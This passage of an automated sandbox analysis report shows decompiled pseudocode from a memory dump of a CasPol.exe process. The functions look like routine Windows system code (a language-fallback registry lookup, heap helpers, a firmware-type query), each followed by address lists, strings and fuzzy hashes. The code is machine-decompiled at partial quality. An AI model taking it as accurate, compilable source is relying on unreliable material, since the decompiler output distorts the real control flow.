					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E013F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E013FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L013BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E013FBB40(_t83, _t102 + 0x24, _t78);
								if(L013C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E013FBB40(_t84, _t102 + 0x24, _t94);
									if(L013C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                        0x013be620
                                                                        0x013be628
                                                                        0x013be62f
                                                                        0x013be631
                                                                        0x013be635
                                                                        0x013be637
                                                                        0x013be63e
                                                                        0x01415503
                                                                        0x01415503
                                                                        0x013be64c
                                                                        0x013be64c
                                                                        0x013be651
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013be661
                                                                        0x013be665
                                                                        0x0141542a
                                                                        0x013be715
                                                                        0x013be71a
                                                                        0x013be71c
                                                                        0x013be720
                                                                        0x013be720
                                                                        0x013be727
                                                                        0x013be736
                                                                        0x013be736
                                                                        0x013be743
                                                                        0x013be743
                                                                        0x013be673
                                                                        0x013be678
                                                                        0x013be67d
                                                                        0x013be682
                                                                        0x013be685
                                                                        0x013be692
                                                                        0x013be69b
                                                                        0x013be6a3
                                                                        0x013be6ad
                                                                        0x013be6b1
                                                                        0x013be6b2
                                                                        0x013be6bb
                                                                        0x013be6bf
                                                                        0x013be6c0
                                                                        0x013be6c8
                                                                        0x013be6cc
                                                                        0x013be6d5
                                                                        0x013be6d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013be6e5
                                                                        0x013be6ea
                                                                        0x013be6f9
                                                                        0x013be70b
                                                                        0x013be70f
                                                                        0x01415439
                                                                        0x0141545e
                                                                        0x0141545e
                                                                        0x00000000
                                                                        0x0141545e
                                                                        0x0141543b
                                                                        0x0141543e
                                                                        0x01415440
                                                                        0x01415445
                                                                        0x01415472
                                                                        0x01415475
                                                                        0x0141548d
                                                                        0x01415493
                                                                        0x014154a9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014154ab
                                                                        0x014154b4
                                                                        0x014154bc
                                                                        0x014154c8
                                                                        0x014154de
                                                                        0x014154fb
                                                                        0x014154e0
                                                                        0x014154e6
                                                                        0x014154eb
                                                                        0x014154eb
                                                                        0x014154de
                                                                        0x00000000
                                                                        0x014154bc
                                                                        0x01415477
                                                                        0x0141547a
                                                                        0x01415480
                                                                        0x01415483
                                                                        0x01415486
                                                                        0x0141548b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141548b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415447
                                                                        0x01415447
                                                                        0x01415447
                                                                        0x01415447
                                                                        0x0141544e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415450
                                                                        0x01415452
                                                                        0x01415455
                                                                        0x0141545a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141545c
                                                                        0x0141546a
                                                                        0x0141546d
                                                                        0x0141546f
                                                                        0x00000000
                                                                        0x0141546f
                                                                        0x013be70f

                                                                        Strings
                                                                        • @, xrefs: 013BE6C0
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 013BE68C
                                                                        • InstallLanguageFallback, xrefs: 013BE6DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1757540487
                                                                        • Opcode ID: 6da4d3ee3941bc005e5cb15b24824fd8b72ab753118cc87652b84f37c607b484
                                                                        • Instruction ID: db7f74533f85c20d8d1841ec132daa9e2d321ae620ba578efbc208f08351d66a
                                                                        • Opcode Fuzzy Hash: 6da4d3ee3941bc005e5cb15b24824fd8b72ab753118cc87652b84f37c607b484
                                                                        • Instruction Fuzzy Hash: F25192766043469BD710DF68C480BEBB7E8AF89618F05093EFA85DB654F734D904C792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DB8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E013DB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x14a8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E013BB150();
						__eflags =  *0x14a7bc8;
						if(__eflags == 0) {
							E01472073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E013DAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                        0x013db8f0
                                                                        0x013db8f2
                                                                        0x013db8f4
                                                                        0x01422c4e
                                                                        0x01422c50
                                                                        0x01422c56
                                                                        0x01422c5c
                                                                        0x01422c60
                                                                        0x01422c7f
                                                                        0x01422c84
                                                                        0x01422c62
                                                                        0x01422c77
                                                                        0x01422c7c
                                                                        0x01422c8a
                                                                        0x01422c8f
                                                                        0x01422c94
                                                                        0x01422c9c
                                                                        0x01422ca5
                                                                        0x01422ca5
                                                                        0x01422c9c
                                                                        0x01422c50
                                                                        0x013db8fa
                                                                        0x013db902
                                                                        0x013db921
                                                                        0x013db921
                                                                        0x013db924
                                                                        0x013db924
                                                                        0x013db927
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013db929
                                                                        0x013db92b
                                                                        0x013db92d
                                                                        0x013db940
                                                                        0x00000000
                                                                        0x013db940
                                                                        0x013db932
                                                                        0x013db932
                                                                        0x00000000
                                                                        0x013db932
                                                                        0x00000000
                                                                        0x013db904
                                                                        0x013db904
                                                                        0x013db90a
                                                                        0x013db90c
                                                                        0x013db916
                                                                        0x013db919
                                                                        0x013db915
                                                                        0x013db915
                                                                        0x013db91b
                                                                        0x013db91b
                                                                        0x00000000
                                                                        0x013db910

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: a0ae6245d591902d183e5344d188321ddbe3d5bba689d032384dda4e337efc3e
                                                                        • Instruction ID: fbaf97df51dc09400636c3a2087754fc4615b15c914423a3aaa81828712145af
                                                                        • Opcode Fuzzy Hash: a0ae6245d591902d183e5344d188321ddbe3d5bba689d032384dda4e337efc3e
                                                                        • Instruction Fuzzy Hash: 7A115B323041428FEB29D71AE485F3AFBA9EF4162CF16802EE046CB359EB70D884C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E0147E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0147BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0147BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0147AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E013F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0147A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0147A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E013F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0147A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0147A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E013D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E013CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E013CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E013D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0146FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                        0x0147e547
                                                                        0x0147e549
                                                                        0x0147e54f
                                                                        0x0147e553
                                                                        0x0147e557
                                                                        0x0147e55a
                                                                        0x0147e55c
                                                                        0x0147e55f
                                                                        0x0147e561
                                                                        0x0147e567
                                                                        0x0147e56b
                                                                        0x0147e7e2
                                                                        0x00000000
                                                                        0x0147e571
                                                                        0x0147e575
                                                                        0x0147e577
                                                                        0x0147e57b
                                                                        0x0147e57c
                                                                        0x0147e57d
                                                                        0x0147e57e
                                                                        0x0147e57f
                                                                        0x0147e588
                                                                        0x0147e58f
                                                                        0x0147e591
                                                                        0x0147e592
                                                                        0x0147e592
                                                                        0x0147e596
                                                                        0x0147e59e
                                                                        0x0147e5a0
                                                                        0x0147e5a6
                                                                        0x0147e61d
                                                                        0x0147e61d
                                                                        0x0147e621
                                                                        0x0147e623
                                                                        0x0147e630
                                                                        0x0147e630
                                                                        0x0147e7e6
                                                                        0x0147e7eb
                                                                        0x0147e7ed
                                                                        0x0147e7f4
                                                                        0x0147e7fa
                                                                        0x0147e7ff
                                                                        0x0147e7ff
                                                                        0x0147e80a
                                                                        0x0147e812
                                                                        0x0147e812
                                                                        0x0147e5ab
                                                                        0x0147e5b4
                                                                        0x0147e5b9
                                                                        0x0147e5be
                                                                        0x0147e5c0
                                                                        0x0147e5c2
                                                                        0x0147e5c8
                                                                        0x0147e5c9
                                                                        0x0147e5cb
                                                                        0x0147e5cc
                                                                        0x0147e5d5
                                                                        0x0147e5e4
                                                                        0x0147e5f1
                                                                        0x0147e5f8
                                                                        0x0147e5f8
                                                                        0x0147e5d5
                                                                        0x0147e602
                                                                        0x0147e616
                                                                        0x0147e63d
                                                                        0x0147e644
                                                                        0x0147e64d
                                                                        0x0147e652
                                                                        0x0147e657
                                                                        0x0147e659
                                                                        0x0147e65b
                                                                        0x0147e661
                                                                        0x0147e662
                                                                        0x0147e664
                                                                        0x0147e665
                                                                        0x0147e66e
                                                                        0x0147e67d
                                                                        0x0147e68a
                                                                        0x0147e691
                                                                        0x0147e691
                                                                        0x0147e66e
                                                                        0x0147e6b0
                                                                        0x00000000
                                                                        0x0147e6b6
                                                                        0x0147e6bd
                                                                        0x0147e6c7
                                                                        0x0147e6d7
                                                                        0x0147e6d9
                                                                        0x0147e6db
                                                                        0x0147e6de
                                                                        0x0147e6e3
                                                                        0x0147e6f3
                                                                        0x0147e6fc
                                                                        0x0147e700
                                                                        0x0147e700
                                                                        0x0147e704
                                                                        0x0147e70a
                                                                        0x0147e70a
                                                                        0x0147e713
                                                                        0x0147e716
                                                                        0x0147e719
                                                                        0x0147e720
                                                                        0x0147e761
                                                                        0x0147e76b
                                                                        0x0147e774
                                                                        0x0147e77a
                                                                        0x0147e77a
                                                                        0x0147e78a
                                                                        0x0147e791
                                                                        0x0147e799
                                                                        0x0147e79b
                                                                        0x0147e79f
                                                                        0x0147e7aa
                                                                        0x0147e7c0
                                                                        0x0147e7ac
                                                                        0x0147e7b2
                                                                        0x0147e7b9
                                                                        0x0147e7b9
                                                                        0x0147e7c7
                                                                        0x0147e806
                                                                        0x00000000
                                                                        0x0147e7c9
                                                                        0x0147e7d1
                                                                        0x0147e7d8
                                                                        0x00000000
                                                                        0x0147e7d8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147e722
                                                                        0x0147e72e
                                                                        0x0147e748
                                                                        0x0147e74c
                                                                        0x0147e754
                                                                        0x0147e756
                                                                        0x0147e75c
                                                                        0x0147e75c
                                                                        0x00000000
                                                                        0x0147e75c
                                                                        0x0147e758
                                                                        0x0147e758
                                                                        0x00000000
                                                                        0x0147e758
                                                                        0x0147e750
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147e752
                                                                        0x00000000
                                                                        0x0147e752
                                                                        0x0147e730
                                                                        0x0147e735
                                                                        0x0147e73d
                                                                        0x0147e73f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147e741
                                                                        0x0147e741
                                                                        0x00000000
                                                                        0x0147e741
                                                                        0x0147e739
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147e73b
                                                                        0x00000000
                                                                        0x0147e73b
                                                                        0x0147e722
                                                                        0x0147e720
                                                                        0x0147e6b0
                                                                        0x0147e618
                                                                        0x00000000
                                                                        0x0147e618

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction ID: 5ab8628fb2abde6e5640905e3be9b09cfd28b8c34b046078bcc215de3c5235db
                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction Fuzzy Hash: 7A91B5312043429FE724CF29C941B9BBBE5BF84714F148A6EF699DB2A0E774E904CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014351BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E014351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x14905f0);
				E0140D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E013CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E014353CA(0);
						return E0140D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E013FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E013D3690(1, _t117, 0x1391810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E013FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L013D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E013FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0143500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E013F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                        0x014351be
                                                                        0x014351c3
                                                                        0x014351c8
                                                                        0x014351cd
                                                                        0x014351d0
                                                                        0x014351d3
                                                                        0x014351d8
                                                                        0x014351db
                                                                        0x014351de
                                                                        0x014351e0
                                                                        0x014351e3
                                                                        0x014351e6
                                                                        0x014351e8
                                                                        0x01435342
                                                                        0x01435351
                                                                        0x01435356
                                                                        0x0143535a
                                                                        0x01435360
                                                                        0x01435363
                                                                        0x01435366
                                                                        0x01435369
                                                                        0x01435369
                                                                        0x0143536b
                                                                        0x0143536b
                                                                        0x01435370
                                                                        0x014353a3
                                                                        0x014353a4
                                                                        0x014353a6
                                                                        0x014353ab
                                                                        0x014353ab
                                                                        0x014353ae
                                                                        0x014353ae
                                                                        0x014353b5
                                                                        0x014353bf
                                                                        0x014353bf
                                                                        0x01435375
                                                                        0x01435396
                                                                        0x014353a0
                                                                        0x014353a0
                                                                        0x00000000
                                                                        0x01435396
                                                                        0x01435377
                                                                        0x01435379
                                                                        0x0143537f
                                                                        0x0143538c
                                                                        0x01435390
                                                                        0x00000000
                                                                        0x01435390
                                                                        0x014351ee
                                                                        0x014351f1
                                                                        0x01435301
                                                                        0x01435310
                                                                        0x01435315
                                                                        0x01435318
                                                                        0x0143531b
                                                                        0x01435320
                                                                        0x0143532e
                                                                        0x01435331
                                                                        0x00000000
                                                                        0x01435331
                                                                        0x01435328
                                                                        0x01435329
                                                                        0x00000000
                                                                        0x01435329
                                                                        0x014351fa
                                                                        0x01435235
                                                                        0x01435236
                                                                        0x01435239
                                                                        0x0143523f
                                                                        0x01435240
                                                                        0x01435241
                                                                        0x01435242
                                                                        0x01435246
                                                                        0x01435247
                                                                        0x0143524e
                                                                        0x01435251
                                                                        0x01435267
                                                                        0x01435269
                                                                        0x0143526e
                                                                        0x0143527d
                                                                        0x0143527e
                                                                        0x01435281
                                                                        0x01435282
                                                                        0x01435287
                                                                        0x01435288
                                                                        0x0143528a
                                                                        0x0143528f
                                                                        0x01435294
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0143529a
                                                                        0x0143529c
                                                                        0x0143529e
                                                                        0x0143529e
                                                                        0x014352a4
                                                                        0x014352b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014352ba
                                                                        0x014352bc
                                                                        0x014352bc
                                                                        0x014352d4
                                                                        0x014352d9
                                                                        0x014352dc
                                                                        0x014352e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014352e7
                                                                        0x014352f4
                                                                        0x00000000
                                                                        0x014352f4
                                                                        0x01435270
                                                                        0x00000000
                                                                        0x01435270
                                                                        0x014351fc
                                                                        0x014351fd
                                                                        0x01435202
                                                                        0x01435203
                                                                        0x01435205
                                                                        0x0143520a
                                                                        0x0143520f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0143521b
                                                                        0x01435226
                                                                        0x0143522b
                                                                        0x0143521d
                                                                        0x0143521d
                                                                        0x01435222
                                                                        0x01435222
                                                                        0x0143522d
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: c0c0bae463edd0d29ba880bac9d87835457d183f6c2807469db23accb1a09155
                                                                        • Instruction ID: f615562d947df6a3af8a274295a276c133b14dd5ebc5f3137c36fefcb1a378f6
                                                                        • Opcode Fuzzy Hash: c0c0bae463edd0d29ba880bac9d87835457d183f6c2807469db23accb1a09155
                                                                        • Instruction Fuzzy Hash: 185150B1E046099FDB15DFA9C980BAEBBF8FF98704F14402EE649EF261D6719901CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

